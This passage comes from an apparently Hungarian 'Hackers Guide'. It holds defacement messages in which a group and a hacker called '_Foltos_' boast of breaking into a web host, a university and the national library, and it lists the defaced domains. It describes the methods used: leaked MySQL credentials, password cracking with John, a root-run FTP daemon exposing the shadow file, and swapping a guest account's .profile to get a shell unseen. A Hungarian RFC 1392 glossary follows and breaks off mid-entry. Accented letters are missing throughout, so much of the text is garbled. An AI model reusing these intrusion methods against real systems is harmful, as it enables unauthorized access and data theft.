Egy kis lokalis hiba (rosszul beallitott UMASK), hogy a webgroup-ok nagy resze mar eleve tudta irni a html-eleket, tehat mar a rendszer nagy reszet itt tudtuk volna defacelni. Mivel a legtobb host hasznalt mysql-t igy azokok teljes adatbazisat dumpolni tudtuk (nemhiaba, szuper ottlet a database.conf-ban tarolni a mysql usert, passwdt) A rendszer elonyere legyen irva: a mysql total szeparalt meg localhostrol is, a mysql adatbazist nem tudtuk elerni egyetlen user jogosultsagaval sem.) az /etc/mysql/my.cmf nem tartalmazott semmilyen jelszot. Ez ergo problema is lehet, mert a logrotate nem tudja ujrainditani a mysql-t es jelen gepen mar 2000-09 ota nem volt logrotate eppen ezert, de ennel ellenere security szempontjabol jo huzas volt ez az adminok reszerol. talaltunk egy filet /etc/webpasswd melyben vegyesen DES/MD5 jelszavak, melyekbol amiket visszafejtettunk azok mind mukodtek local accountra. (ezt nevezhetjuk a rendszer gyenge pontjanak ? :) Mondjuk a filet addig eleve nem tudtuk olvasni amig nem szereztuk meg az apachtol a www-root euid,egid-et..
- Ebben a pillanatban mar minden lehetosegunk megvolt arra, hogy barmelyik honlapot defaceljuk, vagy barmelyik honlaphoz tartozo adatbazist lehuzzunk.
34
Hackers Guide
- Kivallogattuk a webpasswd filebol a bash shellel rendelkezo usereket, es azokra engedtuk ra a jo oreg JOHN-t! - 15 usert tortunk meg par perc alatt, ezeknek su-val probaltuk es mindnek ez volt a shelles jelszava mint a webpasswd adatbazisban levo jelszaval. (Szinten a rendszer elonyere legyen irva, hogy ez a 15 user kozul egyetlennek sem volt /bin/bash shellje, foleg false es nehany pine jutott ide.) Ebben a deface-ben a kovetkezo hostok szerepeltek : (minimum :) volt egy kis kavarodas a gepen a webrootok teren :)
afilmsite.com agility.hu amstel canderel.hu bignet autolista.hu geodezia.hu goldfish
e-contact.hu e-start.hu foldnapja.hu gandi.hu gfk-dorel-ipms.hu
loyolacollege.org pityer.hu planetclub.org portar.hu szinyei.hu
tundehullareszegen.hu tutynet.com webkom.hu windrivers.hu
posterprint.hu trax.hu plakatgyar.hu profitinfo.hu uzlethaz.com poster-display.net regiszterplakat.hu
Na legyetek jok, mi meg csak figyelunk titeket - Haxor Nation Crew -
************************************************************************************************
Nyugatmagyarorszgi Egyetem feltrse
A Rendszergazdnak.... Figyelmeztetni szeretnm, hogy a rendszere nagyon tjrhat!!! Brki nyugodtan bejhet, s letlthet brmit a szerverrl, vagy rosszabb esetben le is trlheti annak teljes tartalmt...
35
Hackers Guide
Ha teheti ldozon egy kis idt a biztonsgra, vagy esetleg az OP rendszer lecserlsre, mert a SUN rendszerek nagyon sebezhetek.... A rendszer hibi: - A telnet s az ftp elrs brhonnan elrhet, nincs lekorltozva, gy brki egy accountal brhonnan bemehet a szerverre, s ott garzdlkodhat.... /etc/hosts.deny - A userek ltrehozsakor elkvetett egy nagy hibt, ugyanis ha egy user mg nem lpett be , akkor az els belpsnl megkrdezi, hogy mi legyen a jelszava, gy brki knnyen accountot szerezhet a szerverre... - SunOS tele van hibkkal, meg suid bit-es programokkal, amik kzl nagyon sok srlkeny, gy brki nyugodtan egy program elindtsval root jogokat szerezhet.... / lpset exploit / / Ennek kikszblsre nzzen krl www.hack.co.za-n s az astalavista.box.sk-n, ott vannak leirasok, hogy hogyan kerlhetjk el az ilyen irany programhibkat, pl suid bit levtele/ - Az x-es elrs is brhonnan elrhet, ez nem akkora hiba, de egy csom exploit csak x felleten fut.. Ilex.efe.hu hiba: Huhh, ez mr azrt jobban megvan csinlva, de itt is van mit foltozni, pl az aleph knyvtri szolgaltatson. Vegynk egy pldt, valaki brhonnan betelnetel az aleph userrel a knyvtrra, s ltja, hogy egy sima account, csak a profile file-ban van megoldva, hogy ne shell-t kapjon, hanem az aleph programot. Namrmost, ha valaki egy kicsit is gondolkozik fogja magt, beftp-zik aleph userrel/ nincs letiltva /, s letlti a .profile file-t, majd letorni, utana ha betelnetel egybl kap egy shellt, onnan mr gyerekjtk az egsz, ha pedig vgzett a dolgval, fogja magt, visszaftp-zi a .profile filet, es nem is latszik hogy valaki betrt, mert az aleph egy guest user. Csak szeretnm megemlteni, hogy ez a hiba nem csak itt fordult el, hanem az sszes magyar opac s aleph telnet-es szolgltatsnl.... Krem ne vegye azt a deface-et rosszindulat betrsnek, mert ha egy kicsit elgondolkozik, szre veszi, hogy n nem a rossz oldalon llok, nyugodtan letrlhettem volna mindent, vagy DOS tmadsra is hasznlhattam volna a szervert, de nem tettem......
By _Foltos_
************************************************************************************************
36
Hackers Guide
Orszgos Szchenyi Knyvtr feltrse
A rendszergazdanak.....
Hat igen, ez a szerver sem a biztonsag csucsa, elegge el van cseszve, marmint az en szemszogembol..... De amint az elozo akciombol is kiderult, en nem vagyok gonosz, igy nem is hasznalom csunya dolgokra a szerver kapacitasat, inkabb segiteni szeretnek, nehogy valami rossz fiu kart tegyen a rendszerben.... A hibak: /ebbol van eleg/ - A telnet es ftp eleres barhonnan elerheto, igy gyerekjatek a dolog / host.deny / - A finger / a kedvencem / is segit a dolgozonak, hogy megdudjon egyet s mast a szerverrol, pl user nevek, de erre meg visszaterek.... - A Sun os egyik legosibb valtozata van a rendszeren, ez vegul is nem nagy hiba, mert erre pont nincs exploit, meg vegulis a root jogokat nem volt konnyu kicsikarni, de azert erdemesebb lenne neha frissiteni az op rendszeren, vagy lecserelni egy hatekonybbra, pl: Debian Potato ....Na , mondjuk ez nem mindig igy van, mert a Sun ujabb verzioi ehhez kepest gyerekjatekok...... - A rendszergazda nem tul gyakran foglalkozik a szerverrel, ami nem tul elonyos a rendszer szemplontjabol / Mentsegere legyen irva ennyi bejelentkezes mellett nincs konnyu dolga / - Az ftp root jogokkal fut, ami azert lehet gond, mert egy kis csellel azon keresztul barki olvashatja a shadow filet....... / A root jelszot nem lehetett visszafejteni meg superszamitogepeken se, egy jo pont.... / Namarmost, egy eszmeletlen hiba, amit nem tudok elkepzeni, hogy miert csinalnak a halando emberek ilyet az, hogy van egy-ket olyan user, aminek usernev=jelszo, es raadasul olyan a belepesi nev, amit minden normalis rendszerbuzerator egybol atnez fingerrel, jelen esetben ez a demo user. Innentol mar gyerekjatek az egesz, es ha valakinek van hozza kedve, nyugodtan lelesheti az egesz halozat forgalmat egy kis programocskaval..... Amugy megjegyzem nem en voltam az elso ezen a szerveren, es az elottem leveo olyan latvanyos nyomokat hagyott, hogy azt nem ezsrevenni.....passwd fileban hirtelen feltuno uj nev kongresszusi kepviselo megjegyzessel.. Csak ennyit akartam tudatni, es remelem nem lesz belol balhe, mert nem azert csinaltam, hogy megmutassam en vagyok a fasza gyerek, hanem azert, hogy egy ekkora intezmenyben igenis figyeljenek oda a rendszwer biztonsagara....
37
Hackers Guide
By _Foltos_
************************************************************************************************
Fggelk
Internet kissztr Ez a dokumentum teljes egszben az 1392-es RFC-n alapszik (G. Malkin), mely viszont nagyrszt a 1208-as RFC-re pl. Folyamatosan bvl s idnknt javtsra kerl. A sztr mg nem kszlt el, vannak mg lefordtlatlan rszek! A sztrral kapcsolatos szrevteleket, javtsokat rmmel vrjuk! Tartalom: A address, address mask, address resolution, ARP (Address Resolution Protocol), ARPA, alias, anonymous FTP, archie, archive site, ARPANET, authentication, Autonomous System, B backbone, BBS (Bulletin Board System), BIND (Berkeley Internet Name Domain), BITNET, BOOTP, bounce, C
38
Hackers Guide
CCITT, client, Computer Emergency Response Team (CERT), connectionless, cracker, Cyberspace, Cyclic Redundancy Check (CRC), D DARPA, default route, Defense Advanced Research Projects Agency (DARPA), dialup, DNS (Domain Name System), domain, dotted decimal notation, E Electronic Mail (email), email address, Ethernet, Ethernet meltdown, F FAQ, FDDI (Fiber Distributed Data Interface), file transfer, finger, For Your Information (FYI), FQDN, fragment, fragmentation, frame, FTP (File Transfer Protocol), Fully Qualified Domain Name (FQDN), FYI, G gated, gateway, Gopher, H hacker, header, heterogeneous network, hop, host, host address, hostname,
39
Hackers Guide
I ICMP (Internet Control Message Protocol), internet, Internet, internet address, IP (Internet Protocol), IP address, IP datagram, IPX (Internetwork Packet eXchange), IRC (Internet Relay Chat), ISDN (Integrated Services Digital Network), J K Kerberos, Kermit, L LAN (Local Area Network), layer, listserv, M mail gateway, mail path, mail server, mailing list, MILNET, MIME (Multipurpose Internet Mail Extensions), MTU (Maximum Transmission Unit), multi-homed host, MX Record (Mail Exchange Record), N name resolution, netiquette, network, NFS(R), NIC (Network Information Center), NIS (Network Information Services), NNTP (Network News Transfer Protocol), node, NSF (National Science Foundation), O P
40
Hackers Guide
packet, packet switching, ping (Packet internet groper), port, POP (Post Office Protocol), postmaster, PPP, Prospero, protocol, proxy ARP, Q queue, R RARP (Reverse Address Resolution Protocol), repeater, RFC (Request For Comments), RFC 822, RIPE (Reseaux IP Europeenne), rlogin, route, routed, router, RPC (Remote Procedure Call), S SLIP (Serial Line IP), SMTP (Simple Mail Transfer Protocol), SQL (Structured Query Language.), stub network, subnet, subnet address, T TCP (Transmission Control Protocol), TCP/IP, Telnet, terminal emulator, terminal server, TN3270, topology, Trojan Horse, U UDP (User Datagram Protocol), Usenet, UUCP (UNIX-to-UNIX CoPy), V
41
Hackers Guide
virus, W WAM (Wide Area Network), World Wide Web (WWW or W3), worm, WYSIWYG, X X (The X Window System), Y Z A address = cm Alapjban vve hromfle cm hasznlatos az Interneten: a levelezsi cm (email address), az IP, internet vagy Internet cm s a hardver vagy MAC cm. Lsd mg: email address, IP address, internet address. address mask = cm maszk Ez egy bitmaszk amit az IP cm hlzati s alhlzati rsznek meghatrozsra hasznlnak. Gyakran egyszeren csak "subnet mask"-nak nevezik, mert az IP cm hlzati rsze knnyen kiderthet ms mdon is. address resolution = cmfelderts Internetes cm hozzrendelse a megfelel hardvercmhez. ARP (Address Resolution Protocol) = cmfeldertsi protokol (eljrs). Egy adott kiszolgl magas szint IP cmhez tartoz alacsony szint hardvercm dinamikus mdon trtn kidertsre hasznljk. Az ARP hatkre csak arra a hlzatra terjed ki, mely tmogatja a minden kiszolgl ltal hallhat "broadcast" csomagokat. Lsd mg: proxy ARP. ARPA Advanced Research Projects Agency. alias = lnv Ez egy olyan nv, mely ltalban rvid s knny megjegyezni, s megfelel egy msik nvnek, mely tbbynire hossz s nehz r emlkezni. anonymous FTP = nvtelen FTP A nvtelen FTP segtsgvel felhasznlk tvoli gpekbe juthatnak be s mindenki szmra elrhet documentumokat, file-okat, programokat hozhatnak el anlkl, hogy ott sajt elrsk lenne. Mindezt az "anonymous" felhasznli nv segtsgvel rhetik el, mely minimlis biztonsgi ellenrzsek utn egy pulikus terletre engedi ket. Lsd mg: archive site, File Transfer Protocol. archie Egy rendszer, amely automatikusan begyjti, indexeli s szolgltatja az informcikat az Interneten. Eredetileg az Internet sszes FTP archvumban tallhat file-okrl ksztett indexelt adatbzist, de a ksbbi verzik mr tbb ms fle informcit is szolgltatnak. Lsd mg: archive site, Gopher, Prospero, Wide Area Information Servers.
42
Hackers Guide
archive site = archv hely (archvum) Egy olyan hely, amely az Internetrl gyjttt file-okat tartalmaz. Az "anonymous FTP hely" pldul ezekhez az file-okhoz biztost hozzfrst az FTP protokoll segtsgvel. Lsd mg: anonymous FTP, archie, Gopher, Prospero, Wide Area Information Servers. ARPANET Egy csomagkapcsolt hlzat, melyet a korai 70-es vekben fejlesztettek, s amely a mai Internet nagyapja volt. Az ARPANET-et 1990 jniusban helyeztk zemen kvl. authentication = azonosts Egy szemly, vagy folyamat kiltnek ellenrzse. [Forrs: MALAMUD] Autonomous System = nfenntart rendszer Olyan tvlasztk (routerek) gyjtemnye, melyek kzs adminisztrci al tartoznak s kzs bels protokollt hasznlnak a csomagok tvonalnak irnytsra. B backbone = gerinchlzat Egy hierarchikusan kialaktott hlzat legmagasabb szintje. Azok a trzs- s tovbbthlzatok, melyek ugyanarra a gerinchlzatra kapcsoldnak biztosan sszekttetsben vannak egymssal. Lsd mg: stub network. BBS (Bulletin Board System) Egy szmtgp a hozztartoz szoftverekkel, mely legtbbszr elektronikus zenetkldsre ad lehetsget, file archvum tallhat rajta a esetlegesen az zemeltet tevkenysgi krvel kapcsolatos ms szolgltatsokkal egytt. Ugyan a legtbb BBS-t hobbibl mkdtetik, egyre nagy szmban csatlakoznak az Internethez is s sok BBS-t zemeltetnek kormnyok, oktatsi intzmnyek s kutatkzpontok. Lsd mg: Electronic Mail, Internet, Usenet. [Forrs: NWNET] BIND (Berkeley Internet Name Domain) A californiai Berkeley egyetem ltal kifejlesztett s terjesztett DNS kiszolgl, mely sok hasonl kereskedelmi szoftver eldje is. BITNET (Because It's Time NETwork) Egy egyetemi szmtgpes hlzat, mely interaktv elektronikus levelezst s file-tviteli szolgltatst nyjt egy "store-and-forward" (trld s tovbbtsd) protokoll segtsgvel, mely az IBM "Job Entry" prokolljn alapul. A Bitnet-II az eredeti Bitnet protokollt IP csomagokba gyazva az Internetet hasznlja adattvitelre. BOOTP A 961-es s 1084-es RFC-kben lert protokoll, melyet a lemez nlkli gpek elindtshoz hasznlnak. Lsd mg: Reverse Address Resolution Protocol. bounce = visszadobs A levelek visszakldse kzbestsi hiba miatt. [Forrs: ZEN] C CCITT (Comite Consultatif International de Telegraphique et Telephonique) Ez a szervezet a United National International Telecommunications Union (ITU - Egyeslt Nemzeti s Nemzetkzi Telekommunikcis Egyesls) s
43
Hackers Guide
feladata, hogy technikai javaslatokat ksztsen telefonos s kommunikcis rendszerekkel kapcsolatban. Minden negyedik vben lsezik a CCITT, amikor is jabb szabvnyokat fogadnak el, a legutbbi ilyen alkalom 1992-ben volt. [Forrs: NNSC] client = kliens Egy szmtgpes rendszer vagy folyamat, mely egy msik szmtgpes rendszer vagy folyamat szolgltatsait kri. Egy munkalloms, mely egy filekiszolgltl egy file tartalmt kri a file-kiszolgl kliense. [Forrs: NNSC] Computer Emergency Response Team (CERT) A CERT-et 1988 novemberben a DARPA hozta ltre a "freg" gy miatt. A CERT az internetes kzssggel egytt azon dolgozik, hogy a szmtgpes biztonsgi gondok esetn ellenlpseket tegyen, felhvja a kzssg figyelmt a biztonsgi krdsekre s kutatatsokat vgezzen a mkd rendszerek biztonsgossgnak fejlesztsre. A CERT 24 rs szolglatot tart, hogy azonnal vlaszolhasson a biztonsgi problmkra, a tmadsok elleni vdekezsre dokumentumokat, ismertetket ad ki. A csapat e mellett szmos levelezsi listt is fenntart, mkdtet egy anonymous FTP kiszolglt a cert.org domainen, ahol a biztonsggal kapcsolatos dokumentumok, programkiegsztsek s segdprogramok elrhetek. A CERT levlben elrhet a "cert@cert.org" cmen, ill. telefonon a +1-412-268-7090 szmon (24 rban). Lsd mg: Defense Advanced Research Projects Agency, worm. connectionless = kapcsolatmentes Adatkommunikcis md, mely sorn a kommunikci elzetes sszekttets nlkl jn ltre. Az adatcsomagok kt gp kztt akr ms tvonalon is kzlekedhetnek, mert azok egymstl fggetlenek. Az UDP egy kapcsolatmentes protokoll. Lsd mg: packet switching, User Datagram Protocol. cracker = betr A betr olyan egyn, aki engedly nlkl prblkozik szmtgpes rendszerekbe trtn bejutssal. Ezek az egynek tbbnyire rosszindulatak ellenttben a buhertorokkal (hackers) s a betrsre tbbfle mdszert ismernek. Lsd mg: hacker, Computer Emergency Response Team, Trojan Horse, virus, worm. Cyberspace = kibertr Ezt a kifejezst William Gibson, a "Neuromancer" c. fantsztikus novelljban hasznlta elszr a szmtgpes vilg s krltte ltez trsadalom lersra. [Forrs: ZEN] Cyclic Redundancy Check (CRC) Egy szm, melyet a tovbbtsra sznt adatokbl kpeznek. A fogad oldalon is kiszmtjk a CRC-t, sszehasonltjk az eredetivel, s gy megllapthat, hogy az tvitel sorn volt-e valamilyen hiba. [Forrs: MALAMUD] D DARPA See: Defense Advanced Research Projects Agency default route = alaprtelmezs tvonal A tvonalvlaszt tblban (routing table) egy olyan bejegyzs, mely meghatrozza, hogy merre menjenek azok az adatcsomagok, melyek a
44
Hackers Guide
tblban nem szerepl hlzatok (vagy gpek) fele irnyulnak. [Forrs: MALAMUD] Defense Advanced Research Projects Agency (DARPA) Az Egyeslt llamok vdelmi minisztriumnak gynksge, mely j technolgik kifejlesztsrt felels a hadsereg szmra. A DARPA (korbban ARPA) volt felels a ma ismert Internet fejlesztsnek tmogatsrt, belertve a Berkeley Unix s TCP/IP verzijt. [Forrs: NNSC] dialup Egy tmeneti kapcsolat szmtgpek kztt, mely hagyomnyos telefonvonalon jn ltre. DNS (Domain Name System) = (domain nv rendszer) A DNS egy ltalnos cllal terjesztett, msolt, adatignyl rendszer. Elsdleges feladata, hogy az Interneten tallhat gpek nevbl megadja azok IP cmt. Manapsg az Interneten a neveket "domain nv" sttulsban adjk meg. Nhny fontosabb domain: .COM (commercial, kereskedelmi), .EDU (educational, oktatsi), .NET (network operations, a hlzat mkdtetsvel kapcsolatos gpek), .GOV (az U.S.A kormnya), .MIL (az U.S.A. hadserege), .US (Egyeslt llamok), .UK (Egyeslt Kirlysg), .AU (Ausztrlia), .HU (Magyarorszg). Gyakran ltni "sub-domain" szinten a fenti domain-eket, vagyis pl. az angoloknl a kereskedelmi gpek a .CO.UK domain-en vannak, vagy az egyiptomi kormnyzat a .GOV.EG domain-en tallhat meg. A domain-ek meghatrozsa az STD 13-ban, az 1034-es s 1035-s RFC-ben tallhat meg. Lsd mg: Fully Qualified Domain Name. domain A "Domain" egy rendkvl sokat hasznlt kifejezs az Interneten. Tbb fle rtelmezsben hasznlatos, gy is mint adminisztratv domain s gy is mint domain nv. Lsd mg_: Domain Name System. dotted decimal notation = decimlis, pontozott jells Az IP cmek A.B.C.D pontozott jellse, ahol az egyes betk decimlis formban a ngy byte-os IP cmek egy-egy byte-jt jelentik. Lsd mg: IP address. [Forrs: FYI4] E Electronic Mail (email) = elektronikus levl Egy rendszer, melynek segtsgvel a szmtgp felhasznlja ms felhasznlval (vagy egy csoportnyi felhasznlval) zenetet vlthat egy szmtgpes hlzat segtsgvel. Az elektronikus levelezs az Internet hasznlatnak egyik legnpszerbb mdja. [Forrs: NNSC] email address = email cm (elektronikus levl cm) Az a domain-rendszer vagy UUCP cm, mely meghatrozza, hogy az elektronikus levlnek mi a clpontja. Pldul egy szerkeszt e-mail cme "gmalkin@xylogics.com", amely szerint a cmzett a "gmalkin" nevezet felhasznl az xylogics.com domain-en. Lsd mg: UNIX-to-UNIX CoPy. [Forrs: ZEN] Ethernet Egy 10 Mbit/sec-es tviteli szabvny LAN-ok (helyi hlzatok) szmra, melyet eredetileg a Xerox fejlesztett ki, de ksbb a Digital, az Intel s a Xerox (DIX). Minden gp egy koaxkbelen csatlakozik a hlzathoz, ahol az elrs a "Carrier Sense Multiple Access with Collision Detection (CSMA/CD)"
45
Hackers Guide
(vivrzkeny egyidej elrs tkzsrzkelssel) technolgia segtsgvel valsul meg. Lsd mg: Local Area Network, token ring. Ethernet meltdown = Ethernet "sztfolys" Egy olyan esemny melynek kvetkeztben teltettsg, vagy teltettsg kzeli llapot jn ltre az etherneten. Ennek legtbbszr illeglis vagy flreirnytott csomagok az okai s tbbnyire csak rvid ideig tart. [Forrs: COMER] F FAQ Frequently Asked Question = Gyakori krdsek FDDI (Fiber Distributed Data Interface) = vegszlas adattviteli illeszt Egy nagy sebessg (100 Mbit/sec) LAN tviteli szabvny. Local Area Network. [Forrs: RFC1208] file transfer = file tvitel Egy file msolsa egyik szmtgprl a msikra a hlzaton keresztl. Lsd mg: File Transfer Protocol, Kermit. finger Egy program, mely egy adott felhasznlrl, vagy egy helyi, ill. tvoli gpbe bejelentkezett felhasznlkrl klnbz adatokat jelent meg. Tbbnyire kirja a teljes nevet, az utols bejelentkezs idejt, az res idt (idle time), a terminl nevt s a terminl helyt (ha lehetsges). Ha a felhasznl gy akarja, akkor a rla rdekldk mg metudhatjk terveit, ill. olvashatnak munkjrl is. For Your Information (FYI) = Hogy tudjon rla ;-)) Az RFC-k egy csoportja, mely nem technikai szabvnyokat, vagy protokoll lersokat tartalmaz. Az FYI-ok tbbnyire ltalnos informcikat tartalmaznak a TCP/IP-vel, ill. az Internettel kapcsolatban. Lsd mg: Request For Comments. FQDN Lsd: Fully Qualified Domain Name fragment = darab Egy csomag egy darabja. Ha az tvlaszt (router) egy IP csomagot olyan hlzatra tovbbt, ahol a csomagok megengedett mrete kisebb, mint a kldtt IP csomag, akkor azt tbb kisebb darabra kell felosztani. Ezeket a darabokat a clgp IP meghajtja aztn jra egymshoz illeszti. fragmentation = darabols Az az IP eljrs, melynek sorn az adatcsomagot kisebb darabokra osztjk fel, hogy megfeleljen azon hlzat ignyeinek, melyen keresztl kell haladnia. frame = keret Az adatcsomagokat a tovbbtrendszer ignyeinek megfelelen "fejlcek" s egyb bevezet informcik kisrik. A valdi adatokat begyazzk ezen ksrinformcik kz. Lsd mg: datagram, packet. FTP (File Transfer Protocol) = file tviteli protokoll Egy protokoll, mely lehetsget ad a felhasznlnak, hogy file-okat hozzon el egy tvoli grl, vagy kldjn t oda. Az FTP ugyanakkor annak a programnak a neveknt is rtelmezhet, melyet a felhasznl hv meg, hogy ezt a protokollt ignybe vegye. Az FTP lersa az STD 9-ben s 959-es RFC-ben tallhat meg. Lsd mg: anonymous FTP. Fully Qualified Domain Name (FQDN) = teljes rtk domain nv
46
Hackers Guide
Az FQDN egy rendszer teljes neve, s nem csak a gp nevt tartalmazza. Pldul a "venera" a gp neve, de a "venera.isi.edu" mr a teljes rtk nv. Lsd mg: hostname, Domain Name System. FYI Lsd: For Your Information G gated Gatedaemon. Egy program, mely egyidejleg tmogat tbbfle tvlaszt (routing) protokollt s protokoll csaldot. Hasznlni lehet tvlasztsra, de hatkony alap az tvlaszt protokollok kutatshoz. A szoftver djmentesen letlthet anonymous FTP-vel a "gated.cornell.edu" cmrl. Lsd mg: routed. gateway = tjr Manapsg az "tvlaszt" (router) kifejezst szoks hasznlni az eredeti "tjr" (gateway) helyett. Az tjr az egy olyan eszkz/program, mely kt hlzat kztt cserli ki az adatokat. Ms rtelmezsben viszont a gateway lehet tjr a protokollok kztt is, de ez alkalmazs szint s nem keverend ssze a hlzatos jelentsvel. Protokollok kztti tjr pl. egy olyan segdprogram, mely az elektronikus leveleket a hrcsoportoknak tovbbtja, ill. vissza. Lsd mg: mail gateway, router. Gopher Terjesztett informcis rendszer, mely informcik hierachikus gyjtemnynek elrst teszi lehetv az Interneten. A Gopher egy egyszer protokollt hasznl, mely egyetlen Gopher kliens szmra lehetv teszi, hogy brmely Gopher szerveren informcikat rhessen el, s mindezt egyetlen Gopher felleten teszi. Lsd mg: archie, archive site, Prospero, Wide Area Information Servers. H hacker = buhertor Egy szemly, ki rmt leli a klnbz rendszerek, klnsen a szmtgpek s a szmtgpes hlzatok bels mkdsnek mlyrehat megismersben. Ezt a kifejezst (hacker) gyakran rossz indulattal hasznljk, pedig a betr, feltr (cracker) lenne a megfelel. Lsd mg: cracker. header = fejrsz A csomag azon rsze, mely megelzi magt az adatot, s tartalmazza a forrs s a cl cmt, a hibakeres kdokat s ms mezket. A fejrsz az elektronikus levlzenet rsze is, mely a levl belsejt (body) elzi meg s sok ms dolog mellett az zenet feladjt, feladsi idejt tartalmazza. Lsd mg: Electronic Mail, packet. heterogeneous network = heterogn hlzat Olyan hlzat, mely tbbfle hlzat protokollt futtat. Lsd mg: IP, IPX. hop = ugrs Az tvlasztsnl hasznlt kifejezs. Egy hlzaton a forrstl a clhoz vezet t az tvlasztkon t egy sorozat ugrsbl ll. host = hoszt (gp, gazdagp)
47
Hackers Guide
Egz szmtgp, mely lehetv teszi felhasznli szmra, hogy valamely hlzaton egy msik hoszttal kommuniklhassanak. Az egyes felhasznlk ezt klnbz alkalmazsok segtsgvel tehetik meg. Ezen alkalmazsok kztt szerepel az elektronikus levelez, a Telnet s az FTP. [Forrs: NNSC] host address = hoszt cm Lsd: internet address hostname A nv, melyet a gpnek adnak. Lsd mg: Fully Qualified Domain I ICMP (Internet Control Message Protocol) = Internet ellenorzo zenet protokoll Az ICMP egy kiegszts az Internet Protokollhoz. Lehetov teszi hibazenetek, teszt csomagok s az IP-vel kapcsolatos informcis zenetek generlst. Lersa megtallhat az STD 5-ben s a 792-es RFC-ben. [Forrs: FYI4] internet Amg az Internet egy hlzat, magt a kifejezst, hogy "internet" legtbbszr egy csoport szmtgpes hlzat esetben hasznljk, melyeket tvlasztk segtsgvel egymshoz kapcsoltak. Lsd mg: network. Internet (itt fontos a nagy "I" bet) Az Internet a legnagyobb internet a vilgon. Hrom szint felptse van, mely a gerinchlzatokbl (pl. NSFNET, MILNET), kzp-szint hlzatokbl s trzshlzatokbl ll. Az Internet egy multiprotokollos internet. Lsd mg: backbone, mid-level network, stub network, transit network, Internet Protocol, Corporation for Research and Educational Networks, National Science Foundation. internet address = internet cm Egy IP cm, mely az internet egyik gpnek sajtja. Az Internet cm (nagy "I"vel) egy az Interneten tallhat gp sajtja. Lsd mg: internet, Internet, IP address. IP (Internet Protocol) = Internet Protokoll Az Internet Protokoll, ahogy annak lersa megtallhat az STD 5-ben s a 791-es RFC-ben, a TCP/IP protokoll alapja. Ez egy kapcsolatmentes, legjobb eredmnyre trekvo, csomagkapcsolt protokoll. Lsd mg: packet switching, Request For Comments, TCP/IP Protocol Suite. IP address = IP cm A 32 bites cm, ahogyan azt az STD 5 s a 791-es RFC lerja. Tbbnyire decimlis, pontozott jells formjban tallkozhatunk vele. Lsd mg: dot address, internet address, Internet Protocol, subnet address, host address. IP datagram Egy nll adatcsomag, mely elegendo informcit hordoz ahhoz, hogy a forrsgptol a clba rnytdjk, anlkl, hogy korbban a forrsgpnek, a clgpnek, vagy a tovbbt hlzatnak egymssal fel kellett volna vennik a kapcsolatot. IPX (Internetwork Packet eXchange) A Novell protokollja, melyet a Netware hasznl. Egy tvlaszt, mely IPX tvlasztssal rendelkezik (routing) sszetud kapcsolni helyi hlzatokat, ezrt a Novell Netware kliensek s kiszolglk egymssal kommuniklni tudnak. Lsd mg: Local Area Network.
48
Hackers Guide
IRC (Internet Relay Chat) Egy vilgmret "parti-vonal" protokoll, mely valsidej beszlgetst tesz lehetov msokkal. Az IRC szerverknt pl fel, mely felhasznlnknt egy kliensprogramtl fogad el kapcsolatot. [Forrs: HACKER] ISDN (Integrated Services Digital Network) = Integrlt Szolgltats Digitlis Hlzat Egy mostansg eloretro technolgia, melyet a telefontrsasgok kezdtek knlni. Az ISDN magban foglalja a hang s digitlis hlzati szolgltatsokat egyedtlen mdin bell, ezzel lehetosget adva az digitlis adatszolgltatsok s a hang szolgltatsok hasznlatt egy egyetlen vezetk segtsgvel. Az ISDN szabvnyait a CCITT hatrozza meg. Lsd mg: CCITT. [Forrs: RFC1208] J K Kerberos A Kerberos a MIT Athena projektjnek biztonsgi rendszere. Szimmetrikus kulcstitkostson alapszik. Kermit A Columbia egyetem ltal kifejlesztett npszer file tviteli protokoll. Mivel a Kermit szinte minden opercis krnyezetben fut, ezrt a file-tvitelnek egy egyszer mdjt biztostja. A Kermit azonban nem egyezik meg az FTP-vel! L LAN (Local Area Network)> = helyi hlzat Egy adattviteli hlzat, melynek feladata mindssze egy nhny ngyzetkilomternyi, vagy ennl kisebb terlet kiszolglsa. Mivel a hlzat csak kis terletet r el, ezrt a hlzati protokollok optimalizlsval akr 100 Mbit/sec. sebessg is elrheto. Lsd mg: Ethernet, Fiber Distributed Data Interface, token ring, Wide Area Network. [Forrs: NNSC] layer = rteg A szmtgpek kommunikcis hlzatt tbb-kevsb fggetlen protokollok csoportostsval lehet ltrehozni, mely protokollok mindegyike kln rtegben (szinten) tallhat. A legalacsonyabb rteg irnytja a hosztok kztti informcit a hardverek szintjn, mg a legmagasabb a felhasznli alkalmazsokkal ll kapcsolatban. Minden rteg az alattalvre pl. Minden rtegnl a programok a rtegnek megfelel protokollt hasznljk a hosztok kztti kommunikcira. A TCP/IP t rtegbl, az OSI htbl ll. A klnbz rtegek hasznlatnak elnye, hogy az informcik rtegek kzti tadsnak mdjt egyrtelmen meghatroztk, gy egy rtegnek a megvltozsa nincs hatssal a tbbi rtegre. Ez nagymrtkben leegyszersti a communikcis programok rst s karbantartst. Lsd mg: TCP/IP Protocol Suite. listserv = listaszerver Automatikus levelezsi lista terjeszt rendszer, melyet eredetileg a Bitnet/EARN hlzat szmra terveztek. Lsd mg: Bitnet, mailing list.
49
Hackers Guide
M mail gateway = levlezsi tjr Egy gp, mely kt vagy tbb levelezrendszert kapcsol ssze (belertve a klnfle levelezrendszereket is) s kicserli az zeneteket kzttk. Az zenetek feltrkpezse s talaktsa gyakran elg bonyolult lehet s tbbnyire a "trols s tovbbts" mdszert kell alkalmazni, ahol a teljes zenetet fogadni kell, mieltt az tovbbtdik a kvetkez rendszerre a megfelel talakts utn. mail path = levelezsi tvonal Gpnevek sorozata, mely meghatrozza, hogy a elektronikus levlnek milyen ton kell haladnia az egyik felhasznltl a msikig. Ezt a cmzsi rendszert elssorban az UUCP hlzatoknl hasznljk. Lsd mg: email address, UNIX-to-UNIX CoPy. mail server = levelez szerver Egy szoftver, mely file-okat, vagy informcikat ad ki levlben kldtt krsek alapjn. A levelez szervereket a Bitnet-ben is hasznljk az FTP-szer szolglatok elltsra. (Megjegyzs: a levlvltokat (mail exchanger) tvesen nevezik levelez szervernek). Bitnet, Electronic Mail, FTP. [Forrs: NWNET] mailing list = levelezsi lista Egy levelezsi cmekbl ll lista, melyet a levlterjeszt hasznl, hogy egy csoportnyi emberhez eljuttassa az zeneteket. A levelezsi listkat tbbnyire bizonyos tmk megvitatsra hasznljk, pp ezrt a klnfle levelezsi listk klnbz tmkkal kapcsolatosak. A levelezsi lista moderlva is lehet. Ez azt jelenti, hogy a levl elszr a modertornak megy, aki eldntni, hogy kimehet-e az zenet a lista tagjainak. A listra val fel- s leiratkozsra vonatkoz krseket mindig egy kln cmre kell kldeni (pl. list-request, 